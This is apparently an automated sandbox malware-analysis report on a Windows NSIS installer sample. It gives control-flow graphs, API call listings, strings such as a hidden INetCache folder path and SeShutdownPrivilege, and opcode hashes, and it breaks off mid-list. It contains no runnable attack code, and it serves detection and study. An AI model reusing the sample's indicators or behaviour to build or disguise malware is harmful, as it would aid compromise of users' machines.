                                                                                                              • String ID: "C:\Users\user\Desktop\FILHKLtCw0.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FILHKLtCw0.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3586999533-837244165
                                                                                                              • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                              • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                              • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                              • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 148 404eb3-404eba 144->148 151 404de4-404deb 145->151 152 404dd7-404dde 145->152 149 404c40-404c5d call 406077 SendMessageW * 2 146->149 150 404c3d 146->150 147->143 153 404c65-404c91 call 404119 * 2 147->153 154 404f2b-404f33 148->154 155 404ebc-404ec2 148->155 149->147 150->149 157 404e60-404e63 151->157 158 404ded-404df0 151->158 152->148 152->151 189 404c97-404c9d 153->189 190 404d5c-404d6f GetWindowLongW SetWindowLongW 153->190 164 404f35-404f3b SendMessageW 154->164 165 404f3d-404f44 154->165 161 405113-405125 call 404180 155->161 162 404ec8-404ed2 155->162 157->148 163 404e65-404e6f 157->163 167 404df2-404df9 158->167 168 404dfb-404e10 call 404a7e 158->168 162->161 170 404ed8-404ee7 SendMessageW 162->170 172 404e71-404e7d SendMessageW 163->172 173 404e7f-404e89 163->173 164->165 174 404f46-404f4d 165->174 175 404f78-404f7f 165->175 167->157 167->168 168->157 186 404e12-404e23 168->186 170->161 181 404eed-404efe SendMessageW 170->181 172->173 173->148 183 404e8b-404e95 173->183 184 404f56-404f5d 174->184 185 404f4f-404f50 ImageList_Destroy 174->185 179 4050d5-4050dc 175->179 180 404f85-404f91 call 4011ef 175->180 179->161 194 4050de-4050e5 179->194 207 404fa1-404fa4 180->207 208 404f93-404f96 180->208 192 404f00-404f06 181->192 193 404f08-404f0a 181->193 195 404ea6-404eb0 183->195 196 404e97-404ea4 183->196 187 404f66-404f72 184->187 188 404f5f-404f60 GlobalFree 184->188 185->184 186->157 197 404e25-404e27 186->197 187->175 188->187 198 404ca0-404ca7 189->198 202 404d75-404d79 190->202 192->193 200 404f0b-404f24 call 401299 SendMessageW 192->200 193->200 194->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 194->201 195->148 196->148 203 404e29-404e30 197->203 204 404e3a 197->204 205 404d3d-404d50 198->205 206 404cad-404cd5 198->206 200->154 201->161 210 404d93-404d9b call 40414e 202->210 211 404d7b-404d8e ShowWindow call 40414e 202->211 213 404e32-404e34 203->213 214 404e36-404e38 203->214 217 404e3d-404e59 call 40117d 204->217 205->198 221 404d56-404d5a 205->221 215 404cd7-404d0d SendMessageW 206->215 216 404d0f-404d11 206->216 222 404fe5-405009 call 4011ef 207->222 223 404fa6-404fbf call 4012e2 call 401299 207->223 218 404f98 208->218 219 404f99-404f9c call 404afe 208->219 210->137 211->161 213->217 214->217 215->205 228 404d13-404d22 SendMessageW 216->228 229 404d24-404d3a SendMessageW 216->229 217->157 218->219 219->207 221->190 221->202 236 4050ab-4050bf InvalidateRect 222->236 237 40500f 222->237 242 404fc1-404fc7 223->242 243 404fcf-404fde SendMessageW 223->243 228->205 229->205 236->179 240 4050c1-4050d0 call 404a51 call 404a39 236->240 241 405012-40501d 237->241 240->179 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->222 244->236 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                              • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                              • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                              • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 507 4060c4-4060cb 503->507 505 4060d0-4060dd 504->505 506 4062cf-4062da 504->506 505->506 510 4060e3-4060ef 505->510 508 4062e5-4062e6 506->508 509 4062dc-4062e0 call 406055 506->509 507->504 509->508 512 4062b0 510->512 513 4060f5-406131 510->513 514 4062b2-4062bc 512->514 515 4062be-4062c1 512->515 516 406251-406255 513->516 517 406137-406142 GetVersion 513->517 514->504 515->504 518 406257-40625b 516->518 519 40628a-40628e 516->519 520 406144-406148 517->520 521 40615c 517->521 522 40626b-406278 call 406055 518->522 523 40625d-406269 call 405f9c 518->523 525 406290-406298 call 406077 519->525 526 40629d-4062ae lstrlenW 519->526 520->521 527 40614a-40614e 520->527 524 406163-40616a 521->524 538 40627d-406286 522->538 523->538 530 40616c-40616e 524->530 531 40616f-406171 524->531 525->526 526->504 527->521 528 406150-406154 527->528 528->521 534 406156-40615a 528->534 530->531 536 406173-406199 call 405f22 531->536 537 4061ad-4061b0 531->537 534->524 548 406238-40623c 536->548 549 40619f-4061a8 call 406077 536->549 541 4061c0-4061c3 537->541 542 4061b2-4061be GetSystemDirectoryW 537->542 538->526 540 406288 538->540 544 406249-40624f call 4062e9 540->544 546 4061c5-4061d3 GetWindowsDirectoryW 541->546 547 40622e-406230 541->547 545 406232-406236 542->545 544->526 545->544 545->548 546->547 547->545 550 4061d5-4061df 547->550 548->544 555 40623e-406244 lstrcatW 548->555 549->545 552 4061e1-4061e4 550->552 553 4061f9-40620f SHGetSpecialFolderLocation 550->553 552->553 557 4061e6-4061ed 552->557 558 406211-406228 SHGetPathFromIDListW CoTaskMemFree 553->558 559 40622a 553->559 555->544 561 4061f5-4061f7 557->561 558->545 558->559 559->547 561->545 561->553
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                              • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                              • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 900638850-1230650788
                                                                                                              • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                              • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                              • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                              • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 577 4058b1-4058bc lstrcatW 569->577 578 4058be-4058bf call 405a55 569->578 570->567 574 4059b7-4059ba 570->574 571->569 571->570 575 4059c4-4059cc call 406398 574->575 576 4059bc-4059c2 574->576 575->567 586 4059ce-4059e2 call 405a09 call 4057fe 575->586 576->567 580 4058c4-4058c8 577->580 578->580 582 4058d4-4058da lstrcatW 580->582 583 4058ca-4058d2 580->583 585 4058df-4058fb lstrlenW FindFirstFileW 582->585 583->582 583->585 587 405901-405909 585->587 588 4059a5-4059a9 585->588 602 4059e4-4059e7 586->602 603 4059fa-4059fd call 4051b4 586->603 590 405929-40593d call 406055 587->590 591 40590b-405913 587->591 588->570 593 4059ab 588->593 604 405954-40595f call 4057fe 590->604 605 40593f-405947 590->605 594 405915-40591d 591->594 595 405988-405998 FindNextFileW 591->595 593->570 594->590 598 40591f-405927 594->598 595->587 601 40599e-40599f FindClose 595->601 598->590 598->595 601->588 602->576 607 4059e9-4059f8 call 4051b4 call 405ef6 602->607 603->567 613 405980-405983 call 4051b4 604->613 614 405961-405964 604->614 605->595 608 405949-405952 call 405846 605->608 607->567 608->595 613->595 617 405966-405976 call 4051b4 call 405ef6 614->617 618 405978-40597e 614->618 617->595 618->595
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 0040586F
                                                                                                              • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 004058B7
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 004058DA
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 004058E0
                                                                                                              • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 004058F0
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                              Strings
                                                                                                              • \*.*, xrefs: 004058B1
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                              • "C:\Users\user\Desktop\FILHKLtCw0.exe", xrefs: 0040584F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: "C:\Users\user\Desktop\FILHKLtCw0.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-3888586214
                                                                                                              • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                              • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                              • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                              • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin, xrefs: 00402154
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInstance
                                                                                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin
                                                                                                              • API String ID: 542301482-3515500811
                                                                                                              • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                              • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                              • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                              • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(75923420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                              • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                              • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                              • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                              • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                              • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                              • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                              • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                              • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                              • DestroyWindow.USER32 ref: 00403CAE
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
